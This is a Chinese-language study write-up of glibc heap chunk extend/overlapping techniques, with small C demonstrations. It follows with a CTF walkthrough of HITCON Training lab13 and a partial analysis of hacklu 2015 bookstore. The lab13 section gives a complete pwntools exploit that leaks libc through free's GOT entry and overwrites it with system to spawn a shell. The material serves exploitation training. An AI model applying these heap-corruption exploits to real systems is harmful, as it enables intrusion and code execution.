跳转至

Extend&Overlapping

Extend&Overlapping

用的是这个 peda-heap 插件

1592376395535-a4605578-9403-429a-93d7-329d4f6cc234.png

对 inuse 的 fastbin 进行 extend

gcc -g 1.c
int main(void)
{
    void *ptr,*ptr1;

    ptr=malloc(0x10);//分配第一个0x10的chunk
    malloc(0x10);//分配第二个0x10的chunk

    *(long long *)((long long)ptr-0x8)=0x41;// 修改第一个块的size域

    free(ptr);
    ptr1=malloc(0x30);// 实现 extend,控制了第二个块的内容
    return 0;
}

然后 gdb 调试,因为前面 gcc 带着 -g 的参数,所以可以直接 b 行号 下断点

当程序进行了两次 malloc 之后堆的情况是这样的

1592375419167-837cdb41-e3fb-44e9-b482-2bfa2ed9d99f.png

下面第九行对 chunk1 的 size 位进行修改,成了这样

1592375746027-54c6d1db-6de7-47c8-80b2-6eb1b01b18a5.png

对 chunk1 进行 free 操作之后,两个合为一个 0x40 大小的了😀

1592375971215-2cb91bcd-d0e5-492f-9057-26fbf4b7c551.png

之后我们再去 malloc 0x30 的话得到的就是 chunk1 跟 chunk2 一起的那个了,我们就可以控制 chunk2 的内容

对 inuse 的 smallbin 进行 extend

//gcc -g 2.c
//注意把之前那个a.out给删掉
int main()
{
    void *ptr,*ptr1;

    ptr=malloc(0x80);//分配第一个 0x80 的chunk1
    malloc(0x10); //分配第二个 0x10 的chunk2
    malloc(0x10); //防止与top chunk合并

    *(int *)((int)ptr-0x8)=0xb1;
    free(ptr);
    ptr1=malloc(0xa0);
}

由于这个例子的申请的 ptr 这个不在 fastbins 中,如果跟 top chunk 相邻,释放的时候会合并掉,所以后面加上一个 chunk,把他们隔离开,防止合并

分别在 11、12、13 行下断点,这是三次 malloc 结束之后的情况

1592376574124-5878387b-e274-44c0-953d-636880728b76.png

这是修改之后的情况

1592376705241-0c7628d5-1a61-4dc0-8b7b-a2eb1a9f9404.png

这时候 free,因为不在 fastbin 范围里面,会放到 unsorted bins 中,可以注意到本来用来隔离的那一个 chunk 的 P 位被标为 0

1592376820551-71f43eec-9d3c-4f9f-b1ad-4bfe1a434561.png

这时候再 malloc 回来就能控制 chunk2 了

对 free 的 smallbin 进行 extend

//gcc -g 3.c
int main()
{
    void *ptr,*ptr1;

    ptr=malloc(0x80);//分配第一个0x80的chunk1
    malloc(0x10);//分配第二个0x10的chunk2

    free(ptr);//首先进行释放,使得chunk1进入unsorted bin

    *(int *)((int)ptr-0x8)=0xb1;
    ptr1=malloc(0xa0);
}

下好断点,两次 malloc 之后

1592378238750-fe513fcd-d616-4c54-8f45-d6e76db06501.png

free 之后,放入到 unsorted bins 中

1592378857748-ca4d5fab-5468-4379-a02b-742ec937a75b.png

对 size 位进行修改,然后再次 malloc 的时候就能对 chunk2 进行控制了

1592380212489-1ec74d98-ac49-4d41-9aea-1c0fec7fa45c.png

通过 extend 后向 overlapping

//gcc -g 4.c
int main()
{
    void *ptr,*ptr1;

    ptr=malloc(0x10);//分配第1个 0x80 的chunk1
    malloc(0x10); //分配第2个 0x10 的chunk2
    malloc(0x10); //分配第3个 0x10 的chunk3
    malloc(0x10); //分配第4个 0x10 的chunk4    
    *(int *)((int)ptr-0x8)=0x61;
    free(ptr);
    ptr1=malloc(0x50);
}

四次 malloc 之后

1592380531074-814f7cf9-4654-4e64-84c2-2ad0540e84fa.png

修改之后成了这样子

1592380908771-b4ed5812-2625-4729-b974-8da661ad6be5.png

free 之后

1592381471158-0cec59ad-98f9-4303-aba3-cecf6d77a8ff.png

这时候再去 malloc 就能控制那几个堆块了

通过 extend 前向 overlapping

//gcc -g 5.c
int main(void)
{
    void *ptr1,*ptr2,*ptr3,*ptr4;
    ptr1=malloc(128);//smallbin1
    ptr2=malloc(0x10);//fastbin1
    ptr3=malloc(0x10);//fastbin2
    ptr4=malloc(128);//smallbin2
    malloc(0x10);//防止与top合并
    free(ptr1);
    *(int *)((long long)ptr4-0x8)=0x90;//修改pre_inuse域
    *(int *)((long long)ptr4-0x10)=0xd0;//修改pre_size域
    free(ptr4);//unlink进行前向extend
    malloc(0x150);//占位块
}

前面几次 malloc 之后

1592382723827-7563b4c8-a1d3-4b8e-8199-0efed7614319.png

对 ptr1 进行 free 之后,可以看到 ptr2 的那个 p 位已经变成 0 了

1592382811425-0a5c94b9-c791-4129-b5e2-72b0cb0810bd.png

修改之后

1592385378726-0755474b-97d0-4b3d-b34f-a7b7761553a6.png

free 操作

1592385445847-37332f55-3fcb-49a5-8453-fa25d3485216.png

HITCON Trainging lab13

实现了增删改查的功能,index 是从 0 开始的,结构是这样的:

一开始先会申请一个 0x10 的 chunk,用来存放申请的 heap 的大小和指针,然后后面才会申请要申请的 heap 的 chunk

1593068531789-54bda6a0-99b1-4c03-ba60-b2e7ef3a0ade.png

有一个 off by one 的漏洞,heaparray[a1] 本来就是存的 size,加上了个 1,可不就是多写了一位

1593067469401-7bd6537e-68fa-405e-91b6-3f504c522fa7.png

这是创建的时候的 size

1593067739915-0db7fe27-8ad5-4e2b-a7be-8311fa3ab0eb.png

可以通用来写下一个堆块的 size 字段,伪造 chunk 的大小,然后 overlapping 更改指针

free 函数的 got 表项的地址

1592484469665-b7401126-733d-41c8-bba4-3bb38ec11d11.png

通过 off by one 把下一个 chunk 的 size 位给改为 0x41,这里的 heap 申请的是 0x18,多出来的 0x8 会直接用下一个 chunk 的 prev_size,所以我们才能把下一个的 size 给覆盖掉

1593068672687-61bcb285-8d76-433c-be82-536728f9e2b4.png

然后在释放的时候,我们释放了一个 0x40,一个 0x20,那么下一次申请的时候,要先申请 0x20 的结构体,所以会先在 0x603070 那个地方存放结构体,在 0x603050 这里放申请的 heap,而对 heap 写内容的时候恰好可以把结构体的内容给覆盖掉为 free 的 got 地址

p64(0) * 4 + p64(0x30) + p64(heap.got['free'])

1593071081718-28d9e04b-643d-4e33-ae5a-5f2285334b7e.png

这样,当 show 的时候展示的就是 free 的 got,拿到他以后可以用来计算 libc,另外,因为在刚刚申请的结构体中,内容现在指向的是 free 的 got,所以只要编辑内容就能够直接把 free 的 got 表里改成 system 的地址

然后之前我们已经把第 0 个 heap 的内容给改成了 /bin/sh,这时候只要 delete(0) 就能拿到 shell

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
r = process('./heapcreator')
heap = ELF('./heapcreator')
libc = ELF('./libc.so.6')
context.log_level = 'debug'

def create(size, content):
    r.recvuntil(":")
    r.sendline("1")
    r.recvuntil(":")
    r.sendline(str(size))
    r.recvuntil(":")
    r.sendline(content)

def edit(idx, content):
    r.recvuntil(":")
    r.sendline("2")
    r.recvuntil(":")
    r.sendline(str(idx))
    r.recvuntil(":")
    r.sendline(content)

def show(idx):
    r.recvuntil(":")
    r.sendline("3")
    r.recvuntil(":")
    r.sendline(str(idx))

def delete(idx):
    r.recvuntil(":")
    r.sendline("4")
    r.recvuntil(":")
    r.sendline(str(idx))

free_got = 0x602018
create(0x18, "dada")  # 0
create(0x10, "ddaa")  # 1
edit(0, "/bin/sh\x00" + "a" * 0x10 + "\x41")
delete(1)
create(0x30, p64(0) * 4 + p64(0x30) + p64(heap.got['free']))  #1
show(1)
r.recvuntil("Content : ")
data = r.recvuntil("Done !")
free_addr = u64(data.split("\n")[0].ljust(8, "\x00"))
libc_base = free_addr - libc.symbols['free']
log.success('libc base addr: ' + hex(libc_base))
system_addr = libc_base + libc.symbols['system']
edit(1, p64(system_addr))
delete(0)
r.interactive()

2015 hacklu bookstore

一个图书订购系统,但是只能订购两本书

先来看看它的结构,一上来就已经把两本书的 chunk 给分配好了(v6、v7),那个 dest 是用来存放一些消息的

1593156572605-ca89b57f-7c9b-4a4b-b65e-6e7ac6e67692.png

在订购的时候,可以一直往里面输入(10 等同于 '\n' ?),那么这里存在一个堆溢出

1593156727653-b20ea39b-33b5-48e2-bd23-7a069d7f065c.png

在删除的时候,没有置为 0,存在 UAF

1593157503353-07996575-1916-4c6f-a0d0-413acaedd8b6.png

在 submit 的时候,会先申请 0x140 大小的 chunk

1593157695576-aa666983-d726-4813-a466-7c725e7b6238.png

然后进行一些列操作,主要作用是通过把前面的追加到刚刚申请的 0x140 的 chunk 中将两本书的内容一起打印出来

1593158136462-2897da5f-b2bd-4568-9929-4dbdf1826f37.png

最后,在退出的时候还有一个格式化字符串漏洞

1593157830270-d80a6693-b4fb-4978-a601-7160d03a02a9.png

程序 submit 之后就退出了,没法重复操作,程序退出后会执行 .fini_array 地址处的函数,但是只能利用一次,我们可以通过格式化字符串来修改它为 main 函数的地址

哎,以后再看

原文: https://www.yuque.com/hxfqg9/bin/ucozlv